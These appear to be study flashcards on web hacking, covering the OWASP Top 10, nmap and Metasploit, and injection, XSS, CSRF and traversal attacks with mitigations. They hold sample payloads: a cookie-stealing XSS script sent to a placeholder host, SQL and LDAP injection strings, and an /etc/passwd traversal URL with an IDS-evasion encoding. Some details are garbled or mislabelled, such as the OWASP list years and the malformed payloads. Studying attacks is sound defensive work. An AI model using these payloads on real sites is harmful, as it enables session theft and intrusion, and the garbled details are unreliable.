Web-based Hacking: Servers and Applications Flashcards
Web Organizations
Internet Engineering Task Force (IETF) - creates engineering documents to help make the Internet work better from an engineering point of view. The IETF’s official documents are published as RFCs
World Wide Web Consortium - international community of member organizations who work together to develop web standards
Request for Comment (RFC)
IETF document to set an Internet standard
Open Web Application Security Project (OWASP)
A non profit focused on improving the security of software
OWASP Top 10
Represents a broad consensus on the top 10 most critical web application security flaws
OWASP Top 10 for 2018
A1. Injection Flaws (SQL, OS and LDAP) A2. Broken authentication and session management A3. Sensitive data exposure A4. XML External Entities A5. Broken Access Control A6. Security mis-configuration A7. Cross-Site Scripting (XSS) A8. Insecure Deserialization A9, Using components with known vulnerabilities A10. Insufficient logging and monitoring
OWASP - Injection Flaws
Injections can be – SQL queries, PHP queries, LDAP queries and OS commands. Wherever a user input is required or use can modify data. It can be a text box, username/password field, feedback fields, comment field, URL etc. Mitigate with Input sanitation: Implement white listing approach at server side for what all can be accepted. Use of safe API’s and parametrized queries.
OWASP - Broken authentication
When an application mismanages session related information such that the user’s identity gets compromised. The information can be in the form of session cookies, passwords, secret keys etc.”
The aim here is to either get into someone else’s session or use a session which has been ended by the user or steal session related information.
Examples:
1. Press the back button after logout to see if you can get into the previous session.
2. Try to hit the URL directly after logging out to check if you are able to access that page.
3. Check for the presence of session-related information in the URLs. Try manipulating them to check if you are able to ride someone else’s session.
4. Try finding the credentials in the source code. Right click on the page and hit view source. Sometimes coders hard code the credentials for easy access which sometimes remain there unidentified.
Mitigate with:
1. Use of multifactor authentication
2. Session isolation
3. Idle session timeouts
4. Using secured cookies
OWASP -Sensitive Data Exposure
“Attackers can sniff or modify the sensitive data if not handled securely by the application. A few examples include use of weak encryption keys, use of weak TLS.”
The goal is to identify sensitive data bits and exploit them. Not protecting data like credit cards, tax ids, and authentication credentials.
Mitigation:
1. Encrypt all data in transit and at rest.
2. Use secure protocols and algorithms.
3. Disable caching of responses with sensitive data. Hackers might get the cached copies and steal the information from them.
OWASP - XML External Entities (XXE)
“An application is vulnerable to XXE attacks if it enabled users to upload a malicious XML which further exploits the vulnerable code and/or dependencies.” This can be used to execute code, steal data and perform other malicious tasks. This includes extracting data, executing a remote request, scanning internal systems, performing denial of service.
Mitigation:
1. Avoid serialization of sensitive data
2. Implement white listing approach at server side to prevent malicious XML upload.
3. Use of Web Application Firewall (WAF) to detect and block XXE.
4. Code review
OWASP - Broken Access control
“Broken access control occurs if a user is able to access unauthorized resources, this can be access to restricted pages, database, directories etc.”
Applications have various account types depending on the users: admins, operators and reporting groups etc. One common problem is that the developers restrict the privileges just on the UI side and not on the server side. If exploited, each user can have admin rights.
Access control detection is not typically amenable to automated static or dynamic testing. Manual testing is the best way to detect missing or ineffective access control, including HTTP method (GET vs PUT).
Mitigation:
1. Invalidate tokens and cookies after logout.
2. Force login/logout after a password change.
3. Server side resource restriction e.g. directories.
4. Restrict access to all resources basis roles.
OWASP - Security misconfigurations
Developers and IT staff ensure functionality and not the security. The configurations are done on the application server, DB server, proxy, applications and other devices need to be in line with the security requirements. Most of the security requirements get missed unless identified by experts or hackers.
Examples of these security misconfigurations are weak passwords, default passwords, default scripts stored on the servers, default directories, default error messages etc.
Mitigation:
1. Have a hardening process in place for both hardware and applications. Do ensure that defaults are changed.
2. Install only the required features from a framework.
3. Review the security of the configurations at fixed intervals.
OWASP - Cross Site Scripting (XSS)
Cross-site scripting occurs when an attacker is able to insert untrusted data/scripts into a web page. The data/scripts inserted by the attackers get executed in the browser can steal users data, deface websites etc.
XSS is of 3 types:
1. Reflected
2. Stored
3. DOM-based
XSS allows attackers to execute scripts in the victim’s browser, hijack user sessions, deface websites, or redirect users to malicious sites.
Mitigation:
1. Output encoding and escaping untrusted characters.
2. Enabling Content-Security-policy (CSP)
OWASP - Insecure Deserialization
Some of the applications save data on the client side and they may be using object serialization. Applications which rely on the client to maintain state may allow tampering of serialized data. This is a new entry in the list and is difficult to exploit.
Example: Altering the serialized objects in the cookies for privilege escalation.
X: x :{ z: z:”NAME”: r:”USER”} –» Normal cookie
X: x :{ z: z:”NAME”: r:”ADMIN”} –» Altered cookie object
Mitigation:
Encryption of the serialized data.
Deserializers to run with least privilege
One of the most serious attacks possible.
OWASP - Using Components with known vulnerabilities
If any components with known vulnerabilities are used by the application, this may lead to security breaches or server takeover. The components can be coding frameworks, libraries, vulnerable functions, network frameworks etc. Examples: 1. Use of vulnerable PHP version 2. Out-dated kernel version – Linux 3. Unpatched windows. 4. Vulnerable jQuery version Mitigation: 1. Frequent patching process. 2. Subscribe to various forums which share the latest vulnerabilities along with the CVE numbers and mitigation techniques/fixes. Check if the vulnerability affects the devices/software in your inventory and fix them.
OWASP - Insufficient logging and monitoring
To ensure the malicious intent of the attackers gets noticed beforehand, it is essential to log all the activity and monitor it for any suspicious behavior.
Examples:
1. Too many failed login attempts from a particular source.
2. Too many requests from a particular source at an extremely fast/slow/fixed rate could be a DOS attempt. DO check and act.
3. Junk traffic
4. Spikes in traffic pattern when not expected.
Mitigation:
1. 24 x 7 monitoring of application traffic and log analysis.
2. Effective Security Incident and response procedures to be in place and practice.
2017 OWASP Top 10
A1. Injection Flaws (SQL, OS and LDAP)
A2. Broken authentication and session management
A3. Cross-Site Scripting (XSS)
A4. Insecure Direct Object References
A5. Security misconfiguration
A6. Sensitive data exposure
A7. Missing Function Level Access Control
A8. Cross Site Request Forgery
A9, Using components with known vulnerabilities
A10. Unvalidated redirects and forwards
Webgoat
OWASP unsecure website for demonstrating web vulnerabilities
Six different stages in web server attack methodology
- Information gathering
- Web server footprinting
- Website mirroring
- Vulnerability scanning
- Session hijacking
- Web server password cracking
Website information gathering and footprinting tools
Netcraft,
HTTPRecon,
IDServe,
HTTPrint
nmap –script http-trace -p80 localhost
Detects a vulnerable server that uses the TRACE method
nmap –script http-google-email
Lists email accounts
nmap –script hostmap-*
Discovers virtual hosts on an IP address that you are attempting to footprint
nmap –script http-enum -p80
Enumerates common web application
nmap -p80 –script http-robots.txt
Grabs the robots.txt
Website Mirroring Tools
wget, blackwidow, httrack, webcopier pro, webripper, surfoffline
Three tiered web application also known as N-Tier architecture
Each tier consists of a single role. Frontend web server, middle layer application server, and a backend database server
Web server vendors
Microsoft IIS, Apache, NGINX
NGINX
A free open source, high performance HTTP server and reverse proxy, as well as an IMAP/POP3 proxy server. Uses predictable amounts of memory under load.
Web Server Security vulnerabilities
Most common are related to misconfiguration of settings, including error messages, default passwords, SSL certificates, scripts, remote admin functions, configuration files, and services on the machine.
Debug Settings
If left enabled on a web server, it will provide attackers information useful in their attack.
Apache httpd.conf
Controls aspects including who can view the server status page which contains information on the server, hosts connected, and requests being attended to. The php.ini file has the verbose error message settings.
Common HTML tags
<img></img>
HTML entities
An HTML entity is a way of telling the browser to display those characters it would otherwise look at as a tag as part of the programming itself. For example, the < symbol which normally indicates the start of a tag can be represented as its actual symbol using HTML entity <
HTTP request methods
GET, HEAD, POST, PUT, DELETE, TRACE and CONNECT
HTTP Response messages
1xx: Informational
2. xx: Success
3xx: Redirection
4xx: Client error
5xx: Server error
Web server attacks
Password attacks, denial of service, man in the middle, DNS poisoning (hijacking), phishing
DNS amplification attack
An attack manipulating recursive DNS to DOS a target.
Directory traversal attack
An unvalidated input attack. The hacker attempts to access restricted directories and execute commands outside intended web server directories. Also known as a dot-dot-slash attack, directory climbing, and backtracking. Example: http://www.example.com/.././../../etc/paswd
Since many IDs devices look for this attack, you can try to evade the IDS by using unicode strings. For example, %2e%2e%2f is the unicode equivalent of ../
URL tampering
Manipulating parameters within the URL string in hopes of modifying data such as permissions and elevation of privileges, prices, quantities of goods and credentials. The trick is to look at the URL and find parameters you can adjust and re-send.
Manipulation of page source code
Looking for hidden attributes in the source code of a web page
Web cache poisoning
To carry out this attack, the attacker must find a vulnerable service code allowing him to fill the HTTP header field with multiple headers. He then forces the cache server to flush its actual cache content and sends a specially crafted request designed to be stored in cache. He then sends a second request forcing the response to come from the cache.
Connection String Parameter Pollution (CSPP) attack
An injection attack that takes advantage of web applications that communicate with databases by using semicolons to separate each parameter. Can be ued to steal user identities and hijack web credentials.
Web Defacement Attack
Altering the look and content of a webpage to inject embarrassing or deceptive information
Web Server Attack tools
Brutus (brute force passwords over HTTP), THC-Hydra (network logon cracker), Metasploit (attack passwords over Telnet, SSH and HTTP)
Metasploit Module Actions
1, Select the exploits you want to use 2, Configure the various options within the exploit 3. Select a target 4. Select the payload 5. Launch the exploit
Metasploit Components
MODULES
EXPLOITS
PAYLOADS (combines the arbitrary code executed if an exploit is successful
AUXILIARY - run one-off actions like a scan
NOPS - used for buffer overflow attacks
REX - library used to handle sockets, protocols and text transformations
Shellshock, also known as Bashdoor
Many internet facing services and some web servers use Bash to process certain requests. Shellshock causes Bash to unintentionally execute commands when the commands are concatenated to the end of function definitions stored in the values of environment variables (usually via CGI).
Identify Web Entry Points
Examine cookies, headers, POST data, encoding and encryption measures,URLs, error messages, session tokens. Tools to identify entry points: WebScarab, HTTPrint, BurpSuite
Web 2,0 vs Web 1,0
Web 1.0 relies on static web pages whereas Web 2.0 provide for more dynamic user participation and therefore suffers more attacks.
Web Server file injection attack
The attacker injects a pointer in a web form to an exploit hosted on a remote site
Web Server command injection attack
The attacker injects commands into the form fields instead of the expected test entry
Web Server shell injection attack
The attacker attempts to gain shell access using Java or other functions
LDAP injection
An attack that exploits applications that construct LDAP statements based on user input. It exploits nonvalidated web input that the form field passes directly as a LDAP query. For example adding the (&) characters between two LDAP query parameters causes the first part of the query to be processed and the second to be ignored because the (&) ends the query prematurely. Example: (&(User=James) (Password=MyPass)) can be changed to (&(User=James) (&) (Password=Anything) and any password will be accepted.
Simple Object Access Protocol (SOAP) Injection
SOAP is designed to exchange structured information in web services in computer networks and uses XML to format information. You can inject malicious query strings that may allow you to bypass authentication and access databases behind the scenes. SOAP is compatible with HTTP and SMTP.
Buffer Overflow Attacks are also known as
Smashing the stack
Buffer Overflow Attack
An attempt to write more data into an application’s prebuilt buffer area in order to overwrite adjacent memory, execute code, or crash an application or system.
NOP sled
In computer security, a NOP slide, NOP sled or NOP ramp is a sequence of NOP instructions meant to “slide” the CPU’s instruction execution flow to its final, desired destination whenever the program branches to a memory address anywhere on the slide.
Canaries or Canary Word
In buffer overflows, canaries are known values placed between the buffer and control data so that if a buffer overflows, the canary word will be altered first, triggering a halt to the system. StackGuard makes uses of this for protection.
Cross Site Scripting (XSS)
Injecting malicious script as unvalidated input, causing the web server to process the malicious script.
XSS URL example
http://IPADDRESS/”;!–”=&[()] - instead of the URL passing to an existing page/element internally, it passes to the script behind the forward slash
XSS Document Cookie example
Adding the following to a form entry: &1t;script;window.open(“http://somehwere.com/getcookie.acookie=” + document.cookie#41;</script> - this java script will obtain cookies from users accessing the page
Stored XSS or persistent ot Type-I XSS
Injected script that remains permanently on the target server like in a database, message forum, visitor log or comment field.
Cross Site Forgery Request (CSRF)
Attack that forces a user to execute unwanted actions on a web application in which they are currently authenticated. Example: You send an email with a web link to your teacher that changes your school grade on the grades application the teacher is already authenticated to.
Session Fixation Attack
Similar to CSRF. The attacker logs into a legitimate site and pulls a session ID and then sends an email with a link containing the session ID to a victim. When the victim clicks the email and logs into the same site, the hacker can now log in and run with the user’s credentials. Mitigated by the web server sending random challenge tokens.
Cookie
A small text-based file stored on your system for use by the web server the next time you log on. Contains information such as authentication details, site preferences, shopping cart contents and session details. Cookies are sent in the header of an HTTP response from a web server and may or may no have an expiration date. Cookies can be manipulated to use as spyware, change pricing, and authenticate to a server.
Firefox Cookie Editor
Add on that can be used to tamper with a saved cookie.
SQL Injection
The most common and successful injection attack. Based on manipulation of Structured Query Language (SQL) queries. This can occur when an attacker injects SQL queries directly into an input form. The SQL command bypasses the intent of the front end and executes directly on the SQL database.
SQL Data Handling
- SQL Definition (DDL)
- SQL Manipulation (DML)
- SQL Control (DCL) - most SQL injection falls here
SQL injection attempts
Try a single quote ‘
Try ‘ or 1 = 1–
Try admin ‘– or admin ‘ /*
Try (‘1’=’1- -
Fuzz Testing
Inputting random data into a web form to see what happens.
In-band SQL Injection
The attacker uses the same communication channel to perform and retrieve the results of the attack. Most commonly used. You can use the UNION command to join together SELECT queries. Piggybacking is adding a malicious request on the back of a legitimate one.
Tautology
Describes the behavior of a database system when deciding whether a statement is true. If you can trick the database by providing something that is true.
Out-of-band SQL Injection
Uses different communications channels for the attack and the results. Difficult to pull off. Out-of-band SQLi techniques would rely on the database server’s ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with Microsoft SQL Server’s xp_dirtree command, which can be used to make DNS requests to a server an attacker controls.
Blind/Inferential SQL Injection
Occurs when an attacker knows that the database is susceptible to injection but the error messages and screen returns don’t come back to the attacker. This attack takes time to pull off because of trial and error.
Automated SQL injection scanners
Sqlmap, Sqlninja, Havij (enumeration, code execution, file system manipulation), SQL Brute, Pangolin, SQLExec, Absinthe, BobCat
Snort detection of SQL injection
Snort has signatures for prebuilt SQL rules that can help to detect a SQL injection attack
HTTP response splitting
Is a form of web application vulnerability, resulting from the failure of the application or its environment to properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and similar exploits. HTTP response splitting is a means to an end, not an end in itself. At its root, the attack is straightforward: an attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header. To mount a successful exploit, the application must allow input that contains CR (carriage return, also given by %0d or \r) and LF (line feed, also given by %0a or \n)characters into the header AND the underlying platform must be vulnerable to the injection of such characters. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allow them to create additional responses entirely under their control.
Mitigation of Web Server Attacks
Separate your front end and back end server by a DMZ
Keep up with security patches
Turn off unnecessary services
Set appropriate file and directory permissions
Disable directory listing